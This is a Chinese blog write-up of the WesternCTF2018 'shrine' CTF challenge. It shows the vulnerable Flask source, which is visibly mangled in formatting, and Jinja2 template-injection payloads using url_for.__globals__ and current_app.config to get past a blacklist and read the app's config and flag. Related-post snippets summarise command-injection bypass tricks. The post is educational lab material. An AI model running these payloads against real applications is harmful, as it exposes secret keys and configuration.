[WesternCTF2018]shrine SSTI 绕过黑名单

最新推荐文章于 2024-04-10 17:21:46 发布
最新推荐文章于 2024-04-10 17:21:46 发布
阅读量122 收藏
点赞数
分类专栏: BUUctf 文章标签: ssti
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133028680
版权 
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
    return open(__file__).read() @app.route('/shrine/')
    def shrine(shrine):
        def safe_jinja(s):
            s = s.replace('(', '').replace(')', '')
            blacklist = ['config', 'self']
            return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
            return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__': app.run(debug=True)

这里用了 flask 我们就应该想到是 SSTI 模块注入

其中存在/shrine/ 目录

如何存在safe_jinjia 进行过滤 config 和self

所以平常的就无法实现

我们需要使用其他函数

例如 url_for() 或者 get_flashed_messages()

去读取全局变量 如何访问

我们要注意 这里过滤config和self是因为他们是变量 就会过滤

我们下面的payload中的是属性 所以不会过滤

我们先去看看全局变量

{{url_for.__globals__}}

存在 current_app 就是当前app 那么我们访问一下

/shrine/{{url_for.__globals__['current_app'].config}}

这里的config不会过滤 是因为是属性 所以不会过滤

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
34C3 CTF Web题 extract0r Writeup (软链接实现任意读文件/目录+SSRF绕过内网ip黑名单+Gopher攻击MySQL+zip文件构造)
keyball123的博客
03-28 1万+
extract0r – A web challenge from hxp 34C3 CTF https://ctftime.org/event/544 题目部署 本地搭建: https://github.com/shimmeris/CTF-Web-Challenges/tree/master/SSRF/34c3-2017-extract0r 在34c3-2017-extract0r目录下执...
shrine-commerce
04-04
MDC-100系列代码实验室入门要获得Flutter入门方面的帮助,请查看我们的在线。
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
神社::存储:: WebDAV 为提供一个简单的WebDAV存储。 安装 将此行添加到您的应用程序的Gemfile中: gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not null, primary key # name :string not null # created_at :datetime not null # updated_at :datetime
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
CTF-命令注入绕过技巧总结
键盘的起始页
04-10 260
执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令。cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2。注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行。cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2。管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入。核心:利用管道符”|“将左边命令的输入作为右边命令的输出。
[WesternCTF2018]shrine
Sk1y的博客
06-17 204
考查点:SSTI模板注入,config配置文件,python的内置函数绕过黑名单
BUUCTF [WesternCTF2018] shrine
Senimo
12-16 458
BUUCTF [WesternCTF2018] shrine 考点: Flask模版注入 url_for()和get_flashed_messages()函数绕过黑名单 __globals__、__dict__等变量含义 启动环境: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return op
php沙盒绕过ctf,CTF SSTI(服务器模板注入)
weixin_33124479的博客
04-09 765
基本判断 渲染模板flask/jinjaflask SSTI的基本思路就是利用python中的魔术方法找到自己要用的函数__dict__ 保存类实例或对象实例的属性变量键值对字典__class__ 返回类型所属的对象__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。__bases__ 返回该对象所继承的基类// __base__和__mro__都是用来寻...
模板注入 [WesternCTF2018]shrine1
m0_75178803的博客
02-23 371
发现注册了一个名为FLAG的config,这里可能有flag,通过url_for()与globals()函数,绕过黑名单。输入shrine/{{7*7}}验证成功。存在flask-jinja2模板注入,发现了current_app()函数。查看这个里面的config
[N1CTF 2018]eating_cms parse_url绕过
qq_62046696的博客
12-21 596
parse_url漏洞,有一个办法是使parse_url解析出错,从而无法进入下面的foreach判断。这道题考察的也不算是代码审计,更像是看你注意不注意细节,主要是一个个尝试的麻烦。伪协议访问会被过滤掉,直接到hacker的界面,然后我们就要想如何绕过,这句话是重点,用我们上传的文件名进行system,然后可以用管道符;为什么是这个而不是flag,是因为都试了以下,flag啥也不返回。那么问题又来了,这个既然是假的那真的上传界面在哪呢,文件上传的界面,随便上传了一个发现是一个假的界面。
上传验证绕过全解析
weixin_33941350的博客
04-19 667
目录 0x01 客户端验证绕过(javascript 扩展名检测)0x02 服务端验证绕过(http request 包检测) - Content-type (Mime type) 检测 0x03 服务端验证绕过(扩展名检测) - 黑名单检测 - 白名单检测 - .htaccess 文件攻击 0x04 服务端验证绕过(文件完整性检测) ...
Shrine View-crx插件
04-07
在每次打开一个新标签时,从谷歌地图的卫星视图体验一个有趣的日语Shinto神社。 每次打开一个新选项卡,从谷歌地图的卫星视图享受神社的形象。 神社从5000多点随机选择。 语言:日本語
shrine:使用Shrine项目的MDC的Android模板项目
05-13
SHRINE-Android学习项目MDC-101-MDC-104:适用于Android的材料组件(Java) 您可以使用Shrine作为模板,使用不同的提交以不同的级别启动新的应用程序。 由brucemakallan编辑
简历模板简洁风简洁干练简历模板简历模板简洁风(简洁干练简历模板).zip
06-17
在求职的征途上,一份出色的简历是你通往梦想职位的敲门砖。我们精心准备了一系列面试求职简历模板,旨在帮助你以最佳形象站在潜在雇主面前。这些简历模板不仅设计精美,而且注重内容的清晰呈现,使招聘经理一目了然地看到你的能力和经验。 我们的模板集合了多种风格与布局,无论你是应届毕业生、职场跳槽者还是行业专家,都能在这里找到适合你职业形象的简历设计。每一个模板都经过精心设计,确保你的简历在众多求职者中脱颖而出,同时保持足够的专业度和可读性。 不仅如此,我们的简历模板易于编辑,你可以根据具体职位需求快速调整内容,展现你的个人优势和职业成就。使用这些模板,将大大提高你的面试机会,并帮助你更好地表达自己的价值和潜力。 别让传统且缺乏创意的简历阻碍你迈向成功的道路。立即下载这些精美的简历模板,让你的求职之路更加顺畅,向心仪的工作迈进吧!记住,一个良好的开始是成功的一半,而一份精致的简历,正是你成功的起点。
Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)
06-17
Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)本资源中的源码都是经过本地编译过可运行的,评审分达到95分以上。资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、使用需求,如果有需要的话可以放心下载使用。 Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目) Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型。 Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)
navicat基础操作教程
06-17
Navicat 是一款广泛使用且功能强大的数据库管理工具,它能够连接和管理多种数据库系统,例如 MySQL、MariaDB、Oracle、PostgreSQL、SQLite 等[^1^][^3^][^4^][^5^][^7^][^9^][^10^]。自2001年以来,Navicat 已成为全球超过500万名数据库用户的优选[^1^]。它提供了多达7种语言供客户选择,并且被公认为全球最受欢迎的数据库前端用户界面工具[^1^]。 Navicat 的特点包括强大的数据库连接能力、直观的用户界面、多种功能模块以及数据同步和转换能力[^3^]。它还提供了数据库设计和建模功能,帮助用户规划和设计数据库结构[^3^]。Navicat 适用于多种平台,包括 Microsoft Windows、MacOS、Linux 和 iOS[^1^],并且可以让用户连接到任何本机或远程服务器[^1^]。Navicat Premium 版本允许用户在不同数据库系统间传输数据,并支持批处理作业的计划和执行[^1^]。 Navicat 的功能包括但不限于数据迁移、操作工具、查询编辑、数据库设计器、数据可视化工具、数据
protobuf-3.12.4-cp37-cp37m-win_amd64.whl
最新发布
06-17
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
本科毕业设计:基于UNet的遥感图像语义分割python实现源码+论文(高分项目).zip
06-17
本科毕业设计:基于UNet的遥感图像语义分割python实现源码+论文(高分项目).zip本资源中的源码都是经过本地编译过可运行的,评审分达到95分以上。资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、使用需求,如果有需要的话可以放心下载使用。 本科毕业设计:基于UNet的遥感图像语义分割python实现源码+论文(高分项目).zip本资源中的源码都是经过本地编译过可运行的,评审分达到95分以上。资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、使用需求,如果有需要的话可以放心下载使用。 本科毕业设计:基于UNet的遥感图像语义分割python实现源码+论文(高分项目).zip本资源中的源码都是经过本地编译过可运行的,评审分达到95分以上。资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、使用需求,如果有需要的话可以放心下载使用。 本科毕业设计:基于UNet的遥感图像语义分割python实现源码+论文(高分项目).zip本资源中的源码都是经过本地编译过可运行的,评审分达到95分以上。资源项目的难度比较适中,内容都是经过助教老师审定
protobuf-3.15.1-cp37-cp37m-manylinux1_x86_64.whl
06-17
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值